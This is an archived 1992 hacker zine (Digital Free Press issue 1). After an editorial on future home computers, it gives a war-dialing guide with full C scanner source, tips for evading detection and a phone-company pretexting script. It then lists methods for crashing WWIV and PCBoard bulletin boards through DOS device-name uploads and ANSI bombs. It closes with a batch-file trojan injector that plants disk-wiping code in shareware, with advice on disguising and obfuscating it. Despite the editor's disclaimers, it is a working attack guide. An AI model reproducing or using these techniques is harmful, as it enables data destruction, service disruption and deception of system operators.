home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / zines / Digital Free Press / dfp-1.1 next >
Text File  |  1999-01-28  |  23KB  |  605 lines

  1.               #########             ############       ######### 
  2.               ###########           ############       ###########
  3.               ####    ####          ####               ####    ####
  4.               ####    ####          ####               ####    ####
  5.               ####    ####          ########           ###########  
  6.               ####    ####          ########           #########
  7.               ####    ####          ####               ####
  8.               ####    ####          ####               ####
  9.               ###########           ####               ####
  10.               #########             ####               #### 
  11.  
  12.                             DIGITAL FREE PRESS
  13. -------------------------------------------------------------------------------
  14.                     V 1.0        Issue 1.0        January 1992
  15. -------------------------------------------------------------------------------
  16.  
  17.        * A Publication of The Underground Computing Foundation (UCF) *
  18.  
  19.             * Send Submissions to: underg!hackers@uunet.uu.net *
  20.  
  21.               * Editor: Max Cray (underg!max@uunet.uu.net) *
  22.  
  23.               * BBS: The Underground (401) 841-5607 (v.32) *
  24.  
  25. ------------------------------------------------------------------------------
  26.  
  27. In this Issue:
  28.  
  29.     1. _The Future Computer_ Editorial by Max Cray
  30.     2. Phone Number Scanning by GodNet Raider
  31.     3. Fun with the CLOCK$ device driver by The Riddler
  32.     4. Homegrown Trojan by The BBC
  33.  
  34. ------------------------------------------------------------------------------
  35.  
  36.                            The Future Computer
  37.  
  38.                               by Max Cray
  39.  
  40.     In the future, your computer will be a standard household appliance,
  41. like your water heater. It will probably be sitting in a back closet someplace
  42. rarely seen. It will come with your house. Your house will also have a built
  43. in local area network, and there will be terminals in almost every room.
  44.     The distinction between television, radio, and computer networks will
  45. disappear, as the computer becomes the audio, and visual controller. Your
  46. television will be a peripheral to your computer. It will receive from a cable
  47. and feed into your computer, where you will be able to watch TV from any of the
  48. terminals in the house. The terminals will consist of a monitor, probably with
  49. a slot for a floppy disk, and a keyboard. Your stereo will also be a
  50. peripheral to your computer but specialized music media will disappear as
  51. music, movies, and new forms of entertainment will be distributed digitally on
  52. normal computer disks, or through the network.  Your video camera will also
  53. become a computer PERIPHERAL, and the variety of programming will increase
  54. exponentially, as private individuals will be able to create their own
  55. programming to post on the audiovisual network, for all to experience. There
  56. will be national audiovisual networks, and small private networks, similar to
  57. computer bulletin boards of today, but they will be more like personal TV
  58. stations. Those that watch will also contribute to programming, both real time,
  59. and stored. You will be able to have your computer capture any real time event
  60. you missed for storage, for you to later experiencing, editing, etc. You will
  61. be able to send audio, and audiovisual mail, but normal electronic mail will
  62. stay as many will not want to be seen or heard, especially early in the
  63. morning.
  64.     There will be some political decisions to make, as those who control the
  65. national computer networks will become very powerful, and freedom of expression
  66. issues will continue to crop up, as there will be some who call for regulation.
  67. However the power of the national networks will be leveraged by many smaller
  68. networks, which will in fact have gateways to each other.
  69.     There will be centers for the treatment of those addicted to computers.
  70. Your spouse will think it none too soon.
  71.     All the technology I have discussed already exists. The prime factor that
  72. is preventing the changes to society is the cost of the technology. As we all
  73. know, the cost of technology is always dropping. The speed that society
  74. changes is directly related to the speed that the cost of technology drops.
  75.  
  76. -------------------------------------------------------------------------------
  77.  
  78. To: hackers@underg
  79. Subject: Scanning.
  80. From: gnr@tsf.UUCP (GodNet Raider)
  81. Organization: The CyberUnderground
  82.  
  83.  
  84.                    -=[ Intelligent Phone Number Scanning ]=-
  85.  
  86.                                      -or-
  87.  
  88.                 /**********************************************/
  89.                 /* How to find the number you are looking for */
  90.                 /*  without the help of a friendly operator.  */
  91.                 /**********************************************/
  92.                 
  93.                                 - written by -
  94.                                  GodNet Raider
  95.                                     - of -
  96.                              The CyberUnderground
  97.  
  98.  -=[ "Information is the greatest weapon of power to the modern wizard." ]=-
  99.  
  100. ]----------------------------------------------------------------------------[
  101.  
  102. Introduction:
  103. -------------
  104.  
  105.     This phile is written to help in the eternal search for a place to jack
  106. in. It contains tips that will help to make the most use of phone number
  107. scanners and to better target a particular system.
  108.  
  109.  
  110. Scanning Tools Needed:
  111. ----------------------
  112.  
  113.     The only tools needed is a computer, phone number scanner software, and a
  114. computer modem. The scanner program is one that dials numbers though your
  115. modem under a given prefix and reports if a carrier (the signal that your 
  116. modem is connected to another modem) was found or not. There are a lot of 
  117. programs out there that will do this function nicely but for you obsessed
  118. prodigies out there the source code for a simple scanner is provided at
  119. the end of this phile.
  120.  
  121. Scanning Tips:
  122. --------------
  123.  
  124.     1)  When looking for a particular system (company, school, etc..) keep in
  125.         mind the "+/- ten rule". This rule simply states that most jacks will
  126.         be found within ten (+/-) sequential instances from the normal 
  127.         business phone number. In larger corporations this could be as much
  128.         as twenty (+/-). So to find a site with a business number at 555-1212
  129.         the scanner should start at 555-1202 and try the next twenty
  130.         instances (555-1202 to 555-1222) or ten below and above the base
  131.         number. It should also be noted that in places that had the system
  132.         installed long after it was established this system may not work. But
  133.         due to the great size and expense of some systems they are installed
  134.         day one, so the numbers are assigned to that site (voice, Data, fax,
  135.         etc..) sequentially.
  136.  
  137.     2)  Also in areas with more than one prefix (746, 747, 748) older sites
  138.         will be found on the lower prefixes (746/747), while newer
  139.         installations will be found on the higher ones (747/748).
  140.  
  141.     3)  Scanning should be done in small bursts to avoid alerting the PhoCo
  142.         to what you are up to. This means having the scanner only call about
  143.         3 numbers in a burst then wait 5 - 10 minutes for the next burst. It
  144.         is also a good idea to do no more than 50 tries every other day.
  145.  
  146.     4)  Don't go jacking right after finding a system. It is good practice to
  147.         wait a few days to allow any possible suspicion to wane.   
  148.         It is easer to explain a seemingly one time jacking as "... Sorry,
  149.         must have misdialed a local bbs number. But I did hang up right away
  150.         as not to break any <sic> laws..." Than it is to explain why you
  151.         misdialed the number 50 times in less than 30 minutes.
  152.  
  153.     5)  Social Engineering is always an last resort. Calling the sites 
  154.         business number between 12:30 and 1:30 will allow for the regular
  155.         sysadmin to leave for lunch leaving an intern or other busy/hurried
  156.         employee (who does not have the time to talk) to answer your inquiry.
  157.         Tell the person on the other end something like the following. 
  158.         
  159.             "Hello, This is linemen Xxxxxxx. I am out here at the junction 
  160.             box and am tracing the line noise problem you reported. The
  161.             number on my service request does not show data equipment on that
  162.             line (give the number you are calling at this time)..."
  163.         
  164.         If all goes well you should get a response like the following...
  165.         
  166.             "Oh it seems you people at the PhoCo have screwed up (everyone
  167.             likes to take an elitist attitude toward the PhoCo. An love to
  168.             point out errors and correct them). You have the business number
  169.             listed as the system number(s). The system number(s) is/are..."
  170.  
  171.  
  172. Scanner Source Code:
  173. --------------------
  174.  
  175.     The following source was written for the IBM pc/clones. As much ansi 'c'
  176. was used as possible, but system specific information (like port i/o) has been
  177. set off into specific functions so that it can be converted to other systems
  178. without having to reinvent the wheel. This program takes information from
  179. the command line and writes output to standard i/o. 
  180.  
  181.  +---- Cut Here ----+---- Cut Here ----+---- Cut Here ----+---- Cut Here ---+
  182.  
  183. /*
  184.     scanner.c
  185.     by GodNet Raider
  186.     
  187.         It is assumed that the serial port and modem have already been setup.
  188.         Com 1 & 2 only supported.
  189. */
  190.  
  191. #include <ctype.h>
  192. #include <stdio.h>
  193. #include <stdlib.h>
  194. #include <string.h>
  195. #include <time.h>
  196.  
  197. #define FALSE 0
  198. #define TRUE 1
  199. #define DTR_ON(x) outp(anBCom[x]+4,0x03)
  200. #define DTR_OFF(x) outp(anBCom[x]+4,0x00)
  201. #define CTS(x) inp(anBCom[nPort]+5)&0x0020
  202. #define DATA_READY(x) inp(anBCom[x]+5)&0x0001
  203.  
  204. char
  205.     *aszError [] =
  206.         {
  207.          "\nUsage: SCANNER <Port #> <PreFix> <Start #> <Count>\n"
  208.          "\tPort #  - Serial port number to use.\n"
  209.          "\tPreFix  - Static part of phone number(ie. 1-800-555-, 846-, etc..).
  210. \n"
  211.          "\tStart # - last 4 digits of phone number (ie. 1212, 0065, etc..).\n"
  212.  
  213.          "\tCount   - Number of instances (single stepped) to scan.\n",
  214.          "\nNumbers are out of range.",
  215.          "\nModem error."
  216.         },
  217.     *aszTarget [] = 
  218.         {
  219.          "connect",
  220.          "busy"
  221.         };
  222.  
  223. unsigned int
  224.     anBCom [] = 
  225.         {
  226.          0x3f8,
  227.          0x2f8
  228.         };
  229.  
  230. unsigned int
  231.     Call (unsigned char, char*),
  232.     receive_chr (unsigned long, unsigned char),
  233.     send_chr (unsigned char, unsigned char);
  234.  
  235. void
  236.     FatalError (int),
  237.     main (int, char**),
  238.     Wait (unsigned long);
  239.  
  240. void main (argc, argv)
  241. int
  242.     argc;
  243. char
  244.     *argv [];
  245.  
  246. {
  247.     char
  248.         szWork [128];
  249.     unsigned char
  250.         nPort;
  251.     unsigned int
  252.         nPrsNum,
  253.         nEndNum;
  254.     
  255.     if (argc < 5)
  256.         FatalError (1);
  257.     nPort = (unsigned char) atoi (argv [1]) - 1;
  258.     nEndNum = (nPrsNum = atoi (argv [3])) + atoi (argv [4]);
  259.     if (nPrsNum > 9999 || nEndNum > 9999 || nEndNum <= nPrsNum || nPort > 1)
  260.         FatalError (2);
  261.     while (nPrsNum != nEndNum)
  262.         {
  263.          printf ("%s%04i : ", argv [2], nPrsNum);
  264.          sprintf (szWork, "ATX4Q0V1DT%s%04i\r", argv [2], nPrsNum++);
  265.          printf ("%sCarrier Found\n", (Call (nPort, szWork) ? "" : "No "));
  266.         }
  267.     exit (0);
  268. }
  269.  
  270. unsigned int Call (nPort, ptDialStr)
  271. unsigned char
  272.     nPort;
  273. char
  274.     *ptDialStr;
  275. {
  276.     unsigned long
  277.         nWait;
  278.     unsigned int
  279.         nTmpCnt,
  280.         nResChr,
  281.         nRetCode = FALSE;
  282.     char
  283.         fCont = TRUE,
  284.         szWork [256] = "",
  285.         *ptWork;
  286.  
  287.     DTR_ON (nPort);
  288.     Wait (5);
  289.     while (*ptDialStr)
  290.         if (send_chr (*ptDialStr, nPort))
  291.             ptDialStr++;
  292.         else
  293.             if (!(receive_chr (1l, nPort) & 0xff00))
  294.                 {
  295.                  outp (anBCom [nPort] + 4, 0x00);
  296.                  FatalError (3);
  297.                 }
  298.     ptWork = szWork;
  299.     nWait = time (NULL) + 30;
  300.     while (time (NULL) < nWait && fCont)
  301.         {
  302.          if ((nResChr = receive_chr (1l, nPort)) & 0xff00)
  303.             {
  304.              *(ptWork++) = (char) tolower (nResChr & 0x00ff);
  305.              *ptWork = 0x00;
  306.              for (nTmpCnt = 2; nTmpCnt && fCont; nTmpCnt--)
  307.                 if (strstr (szWork, aszTarget [nTmpCnt - 1]))
  308.                     {
  309.                      if (--nTmpCnt)
  310.                         printf ("[%s] ", aszTarget [nTmpCnt]);
  311.                      nRetCode = !nTmpCnt;
  312.                      fCont = FALSE;
  313.                     }
  314.             }
  315.         }
  316.     DTR_OFF (nPort);
  317.     Wait (5);
  318.     return nRetCode;
  319. }
  320.  
  321. unsigned int send_chr (cCh, nPort)
  322. unsigned char
  323.     cCh,
  324.     nPort;
  325.  
  326. {
  327.     if (CTS (nPort))
  328.         {
  329.          outp (anBCom [nPort], (int) cCh);
  330.          return TRUE;
  331.         }
  332.     return FALSE;
  333. }
  334.  
  335. unsigned int receive_chr (nWait, nPort)
  336. unsigned long
  337.     nWait;
  338. unsigned char
  339.     nPort;
  340. {
  341.     nWait += time (NULL);
  342.     while (time (NULL) < nWait)
  343.         if (DATA_READY (nPort))
  344.             return ((inp (anBCom [nPort]) & 0x00ff) + 0x0100);
  345.     return FALSE;
  346. }
  347.  
  348. void Wait (nWait)
  349. unsigned long
  350.     nWait;
  351. {
  352.     nWait += time (NULL);
  353.     while (time (NULL) < nWait);
  354. }
  355.  
  356. void FatalError (nErrorNum)
  357. int
  358.     nErrorNum;
  359. {
  360.     printf (aszError [nErrorNum - 1]);
  361.     exit (nErrorNum);
  362. }
  363.  
  364.  +---- Cut Here ----+---- Cut Here ----+---- Cut Here ----+---- Cut Here ---+
  365.  
  366. ]============================================================================[
  367.  
  368.  
  369. Date: 08-03-91 (01:37)              Number:    111 of 124
  370.   To: ALL                           Refer#:    NONE
  371. From: <SENSORED>                    Read:      (N/A)
  372. Subj: URGENT                        Status:    PUBLIC MESSAGE
  373. Conf: SYSOPS (5)                    Read Type: GENERAL (-)
  374.  
  375. *** ATTENTION MS-DOS BASED SYSTEM OPERATORS ***
  376.  
  377. This message is not a joke, scare, or farce. Read carefully and please
  378. take precautions to prevent potential damage to your system.
  379.  
  380. A RI sysop has found     [with the help of a local hacker - Ed]
  381. a quite serious problem which appears to be in DOS.
  382. The release of this information has to be done VERY carefully because of
  383. the potential damage which can be done to bbs systems. (maliciously)
  384.  
  385. IF YOU WANT TO PREVENT DAMAGE TO YOUR SYSTEM:
  386.  
  387. Disable uploads with the pattern of CLO*.* immediately. If you do not,
  388. you run the risk of not only crashing the board but losing your CMOS
  389. configuration as well. This has been tested with 3 different PCBoard
  390. systems, and they were affected immediately. This bug also affected the
  391. tested computers in a non bbs environment (ie in DOS).
  392.  
  393. If you would like further information, please arrange a private voice
  394. call or page during the day Saturday. Remember, we have to be very
  395. careful about this information getting out there until this is addressed
  396. and proper precautions have been taken by ALL sysops.
  397.  
  398. This problem is not a virus, trojan, or a particular file.... It is a
  399. file NAME which causes this corruption of cmos configurations in 80286+
  400. class machines, regardless of the file contents... The actual filename
  401. has been PURPOSELY omitted from this message.  Feel free to distribute
  402. this notification to any other PRIVATE sysop base in the area. Note:
  403. This should not be posted publicly, as it could be a potential security
  404. problem and there are likely others that have not been discovered as of
  405. yet. Please take any necessary precautions to protect your system.
  406.  
  407. [Editor's note: It's not that hard to run a MEM with the /d flag to find 
  408. the CLOCK$ device driver.]
  409.  
  410. --------------------------------------------------------------------------
  411.  
  412. Subject: Phrack 35
  413. From: riddler (The Riddler)
  414.  
  415. In Phrack 35 a letter from The Dark Lord Sarik Malthus asking for the
  416. justification of hacking: "...in your mind justify the actions of hackers..."
  417. He runs a small bulletin board (running WWIV v.4.20) with an oppressive
  418. fashion. He censors email and very strictly dictates behaviour on his BBS.
  419. He does this, not by any social standards but by his own, which I admit is
  420. admirable...but not when it suppresses FREEDOM OF INFORMATION. The experience
  421. he has had with hackers was primarily with me crashing his board by repeatedly
  422. finding bugs in the WWIV system. I tried every technique explained in
  423. Phrack 34 with no success. However, I am writing to explain a few ways of
  424. harmlessly and temporarily crashing any WWIV and most other BBS packages.
  425.  
  426. In the MS-DOG environment we are endowd with a few devices such as:
  427. COM1, COM2, AUX, PRN, CON, and CLOCK$, yes there is such a device.
  428.  
  429. Previous to Dark Lord's upgrade to version 4.20 of WWIV he was running version
  430. 4.12.
  431.  
  432. Here are two ways to crash that system:
  433.  
  434. Note: Use XMODEM OR ASCII PROTOCOLS, NOT ZMODEM OR YMODEM.
  435.  
  436. - #1 -
  437.  
  438. Goto to the file xfer section.
  439. Choose to upload a file.
  440. When propted with the filename, type COM2 (most likely where his modem is).
  441. Finding this device as a file, WWIV asks if you would like to add that
  442. filename to the file database; say yes. 
  443. At that point the file "COM2" will appear as a file available for download.
  444. Download it.
  445. Woooops. A big problem occurs when MS-DOG attempts to read from and write
  446. to the same device name simultaniously. Oh well.
  447. What will most likely happen is either a hardware lock-up or a dos
  448. error message like "Write fult error reading COM2, Abort, Retry...."
  449. Both require that a sysop do something to get the system back up.
  450.  
  451. - #2 -
  452.  
  453. Again, goto the file xfer section.
  454. Choose to upload a file
  455. When prompted with the name say you want to upload clock$.zip (ext. does not
  456. matter). Upload any 'ol file on your harddrive, at least 6 bytes or so.
  457. That upload will be fed directly to his clock as a new time setting. The bytes
  458. being rather random, so will the new date/time. When you complete the xfer
  459. WWIV attempts to find out how long you have been xfering for and how much
  460. time you have left for that session and completely keels over.
  461. It will not recover until the sysop has rebooted and reset the clock
  462. or the CMOS-clock (if he has CMOS). 
  463. Clean cut and annoying.
  464.  
  465. - #3 - (not very thoroughly tested but should word)
  466.  
  467. Everything the same as in the previous to cracks up to the device name.
  468. This time upload CON.
  469. Upload your favourite ansi bombs and remap often used keys to = 
  470. nasty dos commands or whatever...on the
  471. remote system's keyboard. Hopefully the sysop will have loaded, the 
  472. regular ansi.sys that comes with DOS. This is being fed directly
  473. to his CON -- his keyboard/screen. Try to do this while the sysop
  474. is in bed.
  475.  
  476. ------------------------------------------------------------------------------
  477. But oh no! Version 4.20 of WWIV came out. What will we do now?
  478. It now prevents users from uploading files by the names of devices 
  479. altogether. 
  480. Try these techniques:
  481. ------------------------------------------------------------------------------
  482.  
  483. - #4
  484.  
  485. Create a zipfile containing a file of no less than 6 bytes (again) with a name
  486. of exactly 6 char's. Then, using your favourite hex editor open your zipfile
  487. and change the two occurences of your chosen filename of the file in the 
  488. zipfile to "ClOck$" (not case sensitive).
  489. After the upload is completed goto the archive menu (a submenu off of the xfer
  490. menu). Choose to extract a file within your zipfile temporarily. Extract the 
  491. clock$ within your freshly uploaded zipfile. WWIV, with the assistance of
  492. PKzip will extract the contained clock$'s contents and spew every byte right 
  493. into the clock$ device again. Clock/cmos screwed again. Locking crashing the
  494. board and locking the computer up. Woops.
  495.  
  496. #5
  497.  
  498. Or try this:
  499. Goto the archive menu in xfer section
  500. choose to (A)dd a file to a temporary archive
  501. then, guess what? choose clock$.
  502. WWIV, again with help from PKzip will (this time) read (not write) from
  503. the clock$. Since it will never reach the EOF it is looking for, as it 
  504. would in a regular file WWIV keels over again. In this process messing
  505. the clock up thoroughly. Locking the board and/or computer up.
  506.  
  507. --------------------------------------------------------------------------
  508. | Uploading clock$ works also, on all PCBoard's versions 14.5 and lower. |
  509. --------------------------------------------------------------------------
  510.  
  511. I have more BBS crashing techniques if you would like them.
  512. Other BBS's different techniques.
  513.  
  514. Happy Cracking and a Happy Crashed Year.
  515. >From of The Underground Computing Foundation.
  516.  
  517. The Riddler
  518. underg!riddler@uunet.uu.net
  519.  
  520. [Editors Note: The UCF does not condone destructive actions. This material
  521.                is distributed to help sysops protect themselves from dangerous
  522.                users like The Riddler.]
  523.  
  524. ------------------------------------------------------------------------------
  525.  
  526. Subject: Fun...
  527. From: bbc (the bbc)
  528.  
  529.     So you say your bored... Want to do somthing but not sure what...
  530. Well how about crashing a smug WWIV sysop! 
  531.  
  532.     Why not not make a trojan [We mean the horse type] and send it
  533. to them. How you say... Well not that weeeeeee... would condone such
  534. an act..... But for information purposes only we will give you the
  535. method to our maddness...
  536.  
  537.     Step 1:
  538.  
  539.         Make a batch file called "INJECT.BAT" and in it place
  540.         the following commands -
  541.         
  542.         ============================================================
  543.         echo off
  544.         cls
  545.         echo e cs:0100 b4 19 cd 21 b9 09 00 33 d2 cd 26 > ~~temp.~tp
  546.         echo w >> ~~temp.~tp
  547.         echo q >> ~~temp.~tp
  548.         debug %1 < ~~temp.~tp > nul
  549.         erase ~~temp.~tp > nul
  550.         ==============================================================
  551.     
  552.     Step 2:
  553.  
  554.         Then copy a *.COM file into the same directory. Should
  555.         be part of some shareware thing that the sysop would like. 
  556.         With docs an all... would not want them to get suspicious,
  557.         now would we.............
  558.  
  559.     Step 3:
  560.  
  561.          Run the following command from the dos prompt...
  562.  
  563.              INJECT <COM file to inject with trojan>
  564.  
  565.     Step 4:
  566.  
  567.         Re- zip, arc, lharc, zoo, ect... the thing with it's
  568.         other files... 
  569.  
  570.     Step 5:
  571.  
  572.        Upload the mess to the unsupecting sysop and watch the fun! 
  573.  
  574.  
  575.     See and you thought hacking was hard...... Of course if thay
  576. get smug and start searching for the injected code.... We'll just have
  577. to add extra code (nops' ect) and switching some of the code around...
  578.  
  579.     Next lesson How to bypass Disk protect programs and WWIV door
  580. security.... Dont miss it.... Same bat time! Same bat channel!
  581.  
  582. The BBC
  583.  
  584. -------------------------------------------------------------------------------
  585.  
  586. [Editors note: In case you missed that BBC hack here it is disassembled:
  587.  
  588. 0100 B419    MOV AH,19    'Get Default Drive
  589. 0102 CD21    INT 21       'Call DOS
  590. 0104 B90900  MOV CX,0009  'Write 9 Sectors
  591. 0107 33D2    XOR DX,DX    'Starting as sector 0
  592. 0109 CD26    INT 26       'Absolute Disk Write (Oouch!)
  593.  
  594. And thats all she wrote...
  595.  
  596. You can protect yourself from software that does this by using a utility
  597. like MIRROR or IMAGE.]
  598.  
  599. Keep those letters coming...
  600.  
  601.                                 The End
  602.  
  603.  
  604.  
  605.